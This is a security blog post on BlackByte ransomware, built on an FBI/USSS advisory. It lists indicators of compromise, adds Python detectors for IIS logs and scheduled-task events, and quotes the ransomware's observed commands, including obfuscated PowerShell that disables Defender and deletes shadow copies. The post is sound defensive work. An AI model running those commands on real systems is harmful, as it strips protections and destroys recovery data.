Siddhant Mishra Aug 23, 2022 2:49:07 AM 8 min read

Return of BlackByte Ransomware

On February 11, 2022, the FBI and the United States Secret Service (USSS) released a joint advisory on BlackByte ransomware, which had compromised multiple US and foreign businesses, including entities in at least three critical infrastructure sectors (government facilities, financial, and food and agriculture). BlackByte is a Ransomware as a Service (RaaS) group whose payload encrypts files on compromised Windows hosts, including physical and virtual servers.

The group behind BlackByte ransomware is believed to be Russia-based, since the adversaries avoid targeting companies in Russia or CIS countries. Additionally, one of the functions used in BlackByte's encryption code was named "Pognali", which means "let's go" in Russian.

Attack pattern: At a glance


  • Perimeter breach: Adversaries exploit unpatched, public-facing applications or services (for example the ProxyShell vulnerabilities in Microsoft Exchange Server, SonicWall VPN appliances, or any other vulnerable VPN gateway), or gain entry through phishing.
  • Installing genuine binaries or applications: Adversaries then install publicly available commercial or non-commercial software such as 'netscanold', 'psexec' or AnyDesk, or rely on living-off-the-land binaries (LOLBins). Administrators use these same tools for legitimate tasks, so their presence alone is difficult to flag as malicious.
  • Lateral movement and privilege escalation: The above utilities are used to discover other systems and move laterally across the network; the adversaries then establish persistence by adding additional administrator accounts.
  • Payload detonation: Using the new administrator account, the ransomware deletes shadow copies via WMI objects, deletes scheduled tasks on hosts, and encrypts the system, dropping a ransom note in each directory. The payloads were reported to ship in different wrappers to evade hash-based detection, and to use a dynamic offset during unpacking to hinder analysis. It was also reported that the payload initially behaved like Windows Defender or an ordinary Windows utility, and only later disabled Windows Defender or other ransomware-protection services before detonation.

Ransomware evolution since last year


  • Attack vectors for reconnaissance and initial compromise have been built around the latest CVEs in public-facing applications such as VPN gateways and email servers.
  • Genuine host and system utilities have been used for lateral movement and privilege escalation.
  • Exploit chains stringing together the ProxyShell CVEs have been used against Microsoft Exchange Server, carrying the attacker from initial compromise through to privilege escalation.

Indicators of Compromise

The following are a few known Indicators of Compromise (IOCs) published jointly by the FBI and USSS and associated with BlackByte ransomware:

Paths/Directories to monitor:
  • Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\root\e22c2559\92c7e946
  • inetpub\wwwroot\aspnet_client
  • Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth
  • Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current
  • Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes
  • Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\scripts
  • Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\scripts\premium
  • %AppData%\BB.ico
  • %AppData%\BlackByteRestore.txt
  • %AppData%\dummy
  • %HOMEPATH%\complex.exe
  • Users\tree.dll

The filenames for suspicious ASPX files appeared to have the following naming conventions:

  • <5 random alphabetical characters>.aspx
  • error<2 capital letters>.aspx
  • iismeta<4 random numbers>.aspx
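As an added example (not code from the advisory or from this post), the following Python script applies the three naming conventions above, together with the exec_code=Response.Write query-string marker from the IIS log pattern described later in this section, to IIS W3C log lines. The log lines are constructed for illustration, and the KNOWN_GOOD allow-list is an assumption that should be checked against a clean Exchange installation; the five-letter convention in particular collides with legitimate OWA pages such as logon.aspx.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Filename conventions for the malicious ASPX files listed in the FBI/USSS advisory.
NAME_PATTERNS = {
    "five-letter":  re.compile(r"^[A-Za-z]{5}\.aspx$"),      # <5 random alphabetical characters>.aspx
    "error-XX":     re.compile(r"^error[A-Z]{2}\.aspx$"),    # error<2 capital letters>.aspx
    "iismeta-NNNN": re.compile(r"^iismeta[0-9]{4}\.aspx$"),  # iismeta<4 random numbers>.aspx
}

# The advisory's request pattern: <FILE_PATH>/<SUSPICIOUS_FILENAME>.aspx?exec_code=Response.Write
EXEC_MARKER = re.compile(r"(?:^|&)exec_code=Response\.Write", re.IGNORECASE)

# Pages shipped with Exchange/OWA that collide with the weakest patterns (logon.aspx is five
# letters; errorFE.aspx matches error<XX>). Assumption: verify this allow-list against a
# clean installation of your Exchange build before relying on it.
KNOWN_GOOD = {"logon.aspx", "errorfe.aspx"}


@dataclass
class Finding:
    line_no: int
    client_ip: str
    uri: str
    reasons: List[str] = field(default_factory=list)


def inspect_request(uri_stem: str, uri_query: str) -> List[str]:
    """Return the reasons a single request looks like web-shell traffic (empty if none)."""
    reasons: List[str] = []
    if EXEC_MARKER.search(uri_query):
        reasons.append("exec_code=Response.Write in query string")
    name = uri_stem.rsplit("/", 1)[-1]
    if name.lower() not in KNOWN_GOOD:
        for label, pattern in NAME_PATTERNS.items():
            if pattern.match(name):
                reasons.append(f"filename matches {label} convention")
    return reasons


def scan_iis_log(text: str) -> List[Finding]:
    """Parse W3C-format IIS log text (space separated, '#Fields:' header) and flag requests."""
    fields: List[str] = []
    findings: List[Finding] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # field names follow the directive
            continue
        if not line or line.startswith("#") or not fields:
            continue
        cols = line.split()
        if len(cols) != len(fields):
            continue                            # malformed or truncated line: skip rather than guess
        rec: Dict[str, str] = dict(zip(fields, cols))
        stem = rec.get("cs-uri-stem", "")
        query = rec.get("cs-uri-query", "-")   # IIS writes "-" when there is no query string
        reasons = inspect_request(stem, "" if query == "-" else query)
        if reasons:
            uri = stem if query == "-" else f"{stem}?{query}"
            findings.append(Finding(line_no, rec.get("c-ip", "?"), uri, reasons))
    return findings


# Constructed sample log (not real traffic); the field order is the default IIS W3C layout.
SAMPLE_LOG = "\n".join([
    "#Software: Microsoft Internet Information Services 10.0",
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status",
    "2022-02-10 03:14:07 10.0.0.5 GET /owa/auth/logon.aspx url=%2fowa%2f 443 - 198.51.100.7 Mozilla/5.0 200",
    "2022-02-10 03:15:22 10.0.0.5 POST /owa/auth/Current/themes/iismeta4321.aspx exec_code=Response.Write(1) 443 - 203.0.113.9 python-requests/2.27 200",
    "2022-02-10 03:15:40 10.0.0.5 GET /aspnet_client/errorEE.aspx - 443 - 203.0.113.9 python-requests/2.27 200",
    "2022-02-10 03:16:01 10.0.0.5 GET /owa/auth/qwzxy.aspx - 443 - 203.0.113.9 python-requests/2.27 404",
])

if __name__ == "__main__":
    for f in scan_iis_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.client_ip} -> {f.uri}: {'; '.join(f.reasons)}")
```

A request that carries the exec_code marker is high confidence on its own; a filename match alone, especially the five-letter one, is a lead to pivot on (source IP, the other URIs that client touched, the file's creation time on disk) rather than an alert by itself.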

Scheduled tasks created for persistence, visible under Windows\System32\Tasks, that should be monitored:

  • C:\Users\<username>\complex.exe -single <SHA256>
  • C:\Windows\System32\cmd.exe /c for /l %x in (1,1,75) do start wordpad.exe /p C:\Users\tree.dll

Monitor scheduled tasks deleted within a short time interval for multiple hosts.
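The two checks above, the persistence task commands and the burst of task deletions across hosts, can be expressed as one detection over scheduled-task audit events. The following Python is an added example, not code from the advisory or this post. It assumes the collector has already normalised Windows Security events 4698 (scheduled task created) and 4699 (scheduled task deleted) into records carrying a host name, a task name and, for creations, the task's action command line (the field names are assumptions); the events themselves are constructed for illustration.

```python
import re
from collections import namedtuple
from datetime import datetime, timedelta
from typing import List

# Normalised scheduled-task audit events (assumed shape of a SIEM record):
# 4698 = task created, 4699 = task deleted. "action" is the task command line as extracted
# from the task XML by the collector; it is empty for deletions.
TaskEvent = namedtuple("TaskEvent", "ts host event_id task action")
Burst = namedtuple("Burst", "start end hosts tasks")

# The persistence commands reported in the advisory, as patterns over the task action.
SUSPICIOUS_ACTIONS = [
    # C:\Users\<username>\complex.exe -single <SHA256>
    re.compile(r"\\complex\.exe\s+-single\s+[0-9a-fA-F]{64}", re.IGNORECASE),
    # cmd.exe /c for /l %x in (1,1,75) do start wordpad.exe /p C:\Users\tree.dll
    re.compile(r"for\s+/l\s+%x\s+in\s+\(1,1,75\)\s+do\s+start\s+wordpad\.exe\s+/p", re.IGNORECASE),
]


def suspicious_task_creations(events: List[TaskEvent]) -> List[TaskEvent]:
    """Task creations whose action matches one of the known persistence commands."""
    return [e for e in events
            if e.event_id == 4698 and any(p.search(e.action) for p in SUSPICIOUS_ACTIONS)]


def deletion_bursts(events: List[TaskEvent], window: timedelta = timedelta(minutes=10),
                    min_hosts: int = 3) -> List[Burst]:
    """Sliding-window correlation: task deletions on >= min_hosts distinct hosts within `window`.

    A single host deleting a task is routine administration; many hosts deleting tasks in
    the same few minutes is what the advisory tells us to look for.
    """
    dels = sorted((e for e in events if e.event_id == 4699), key=lambda e: e.ts)
    bursts: List[Burst] = []
    i = 0
    while i < len(dels):
        j = i
        hosts, tasks = set(), set()
        while j < len(dels) and dels[j].ts - dels[i].ts <= window:
            hosts.add(dels[j].host)
            tasks.add(dels[j].task)
            j += 1
        if len(hosts) >= min_hosts:
            bursts.append(Burst(dels[i].ts, dels[j - 1].ts, frozenset(hosts), frozenset(tasks)))
            i = j           # everything up to j is already part of this burst
        else:
            i += 1
    return bursts


# Constructed events (hostnames, times and the fake 64-hex-character argument are invented).
T = datetime(2022, 2, 10, 2, 10)
SAMPLE_EVENTS = [
    TaskEvent(T, "EXCH01", 4698, "complex", r"C:\Users\svc_backup\complex.exe -single " + "ab" * 32),
    TaskEvent(T + timedelta(seconds=5), "EXCH01", 4698, "tree",
              r"C:\Windows\System32\cmd.exe /c for /l %x in (1,1,75) do start wordpad.exe /p C:\Users\tree.dll"),
    TaskEvent(T + timedelta(minutes=1), "WS-017", 4699, "Raccine Rules Updater", ""),
    TaskEvent(T + timedelta(minutes=1, seconds=30), "WS-022", 4699, "Raccine Rules Updater", ""),
    TaskEvent(T + timedelta(minutes=2), "FS01", 4699, "Raccine Rules Updater", ""),
    TaskEvent(T + timedelta(minutes=2, seconds=40), "SQL02", 4699, "Raccine Rules Updater", ""),
    TaskEvent(T + timedelta(hours=7), "WS-003", 4699, "Adobe Acrobat Update Task", ""),  # lone admin cleanup
]

if __name__ == "__main__":
    for e in suspicious_task_creations(SAMPLE_EVENTS):
        print(f"{e.ts} {e.host}: persistence task '{e.task}': {e.action}")
    for b in deletion_bursts(SAMPLE_EVENTS):
        print(f"{b.start}..{b.end}: {len(b.hosts)} hosts deleted {sorted(b.tasks)}")
```

The window and host threshold are tuning knobs: patch-management or software-deployment jobs can also delete tasks fleet-wide, so the burst detection is best paired with the task name (a deleted "Raccine Rules Updater" task is a strong signal on its own) and with the process that issued the deletion.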

IIS logs contain GET and POST requests to various malicious ASPX files that follow the pattern <FILE_PATH>/<SUSPICIOUS_FILENAME>.aspx?exec_code=Response.Write. Below is a list of observed commands that were executed by the payload:

  • cmd.exe /c powershell -command "$x = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('VwBpA'+'G4ARAB'+'lAGYA'+'ZQB'+'uAG'+'QA'));Stop-Service -Name $x;Set-Service -StartupType Disabled $x"
  • schtasks.exe /DELETE /TN "\"Raccine Rules Updater\"" /F
  • cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
  • cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  • cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
  • cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  • cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
  • cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  • cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
  • cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  • cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
  • cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  • cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
  • cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  • powershell.exe $x = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAg'+'AFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8AC'+'AARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkA'+'F8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA=='));Invoke-Expression $x
  • sc.exe config SQLTELEMETRY start= disabled
  • sc.exe config SQLTELEMETRY$ECWDB2 start= disabled
  • sc.exe config SQLWriter start= disabled
  • sc.exe config SstpSvc start= disabled
  • powershell.exe Set-MpPreference -EnableControlledFolderAccess Disabled
  • sc.exe config MBAMService start= disabled
  • sc.exe config wuauserv start= disabled
  • sc.exe config Dnscache start= auto
  • sc.exe config fdPHost start= auto
  • sc.exe config FDResPub start= auto
  • sc.exe config SSDPSRV start= auto
  • sc.exe config upnphost start= auto
  • sc.exe config RemoteRegistry start= auto
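Two of the commands above hide their real intent behind a Base64 string that has been split into single-quoted fragments and concatenated with + so that no single literal matches a simple string rule. The following Python is an added example, not code from the advisory or this post: it reassembles such literals, decodes them with the .NET encoding named in the command (Unicode is UTF-16LE), and tags each command line with the behaviour it exhibits. The commands in SAMPLE_COMMANDS are transcribed from the list above; the regular expression assumes the fragments are single-quoted, as they are here.

```python
import base64
import re
from typing import List

# Match  [System.Text.Encoding]::<Enc>.GetString([System.Convert]::FromBase64String('..'+'..'))
# and capture the encoding name and the concatenated literal. Assumption: fragments are
# single-quoted, as in the commands reported for BlackByte.
B64_CALL = re.compile(
    r"\[System\.Text\.Encoding\]::(\w+)\.GetString\("
    r"\[System\.Convert\]::FromBase64String\(((?:\s*'[^']*'\s*\+?)+)\)\)",
    re.IGNORECASE,
)
DOTNET_ENCODINGS = {"unicode": "utf-16-le", "bigendianunicode": "utf-16-be",
                    "utf8": "utf-8", "ascii": "ascii"}
SC_CONFIG = re.compile(r"sc\.exe\s+config\s+(\S+)\s+start=\s*(disabled|auto)", re.IGNORECASE)


def decode_embedded_base64(command: str) -> List[str]:
    """Return the plaintext of every split-and-concatenated Base64 literal in a command line."""
    decoded: List[str] = []
    for enc_name, literal in B64_CALL.findall(command):
        joined = "".join(re.findall(r"'([^']*)'", literal))   # drop quotes and '+' operators
        codec = DOTNET_ENCODINGS.get(enc_name.lower(), "utf-16-le")
        decoded.append(base64.b64decode(joined).decode(codec))
    return decoded


def classify(command: str) -> List[str]:
    """Tag a command line with the defence-evasion / impact behaviours it exhibits."""
    decoded = " ".join(decode_embedded_base64(command))
    tags: List[str] = []
    if "WinDefend" in decoded and re.search(r"Stop-Service|Set-Service", command):
        tags.append("defender-service-stopped-and-disabled")
    if re.search(r"Set-MpPreference\s+-EnableControlledFolderAccess\s+Disabled", command, re.IGNORECASE):
        tags.append("defender-controlled-folder-access-disabled")
    if re.search(r"vssadmin\s+resize\s+shadowstorage", command, re.IGNORECASE):
        tags.append("shadow-storage-resized")       # shrinking the store makes Windows discard shadow copies
    if "Win32_Shadowcopy" in decoded and ".Delete()" in decoded:
        tags.append("shadow-copies-deleted-via-wmi")
    if re.search(r"schtasks\.exe\s+/DELETE", command, re.IGNORECASE) and "Raccine" in command:
        tags.append("raccine-rules-updater-task-removed")
    m = SC_CONFIG.search(command)
    if m:
        name, state = m.group(1), m.group(2).lower()
        tags.append(f"service-{'disabled' if state == 'disabled' else 'set-auto'}:{name}")
    return tags


# Transcribed from the observed-command list in the advisory (a representative subset).
SAMPLE_COMMANDS = [
    "cmd.exe /c powershell -command \"$x = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('VwBpA'+'G4ARAB'+'lAGYA'+'ZQB'+'uAG'+'QA'));Stop-Service -Name $x;Set-Service -StartupType Disabled $x\"",
    'schtasks.exe /DELETE /TN "\\"Raccine Rules Updater\\"" /F',
    "powershell.exe $x = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAg'+'AFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8AC'+'AARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkA'+'F8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA=='));Invoke-Expression $x",
    "cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB",
    "powershell.exe Set-MpPreference -EnableControlledFolderAccess Disabled",
    "sc.exe config MBAMService start= disabled",
    "sc.exe config RemoteRegistry start= auto",
]

if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        plain = decode_embedded_base64(cmd)
        print(f"{classify(cmd)}  decoded={plain}  <- {cmd[:60]}")
```

Run against the list, the first command decodes to WinDefend (so it stops and disables the Defender service) and the Invoke-Expression one decodes to Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}, which is the WMI shadow-copy wipe mentioned in the attack pattern above. Decoding at ingest time, rather than matching on the encoded text, is what keeps the rule working when the attacker reshuffles the fragment boundaries.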

Summary

The advisory on BlackByte is a stark reminder of how critical it is to have a proper threat detection and asset monitoring strategy in place. The time from the announcement of a new CVE to its weaponization is shrinking year on year. Organizations have no choice but to run multi-layered security monitoring and defensive controls in their environments.

Persistent adversaries like the group behind BlackByte are likely to bypass one security measure or another, but it is much harder for them to bypass all of them. These targeted campaigns and the evolution of their TTPs are likely to continue, and it has become imperative for blue teams to keep evolving their detection and containment strategy as well.


Siddhant Mishra

A cyber security enthusiast.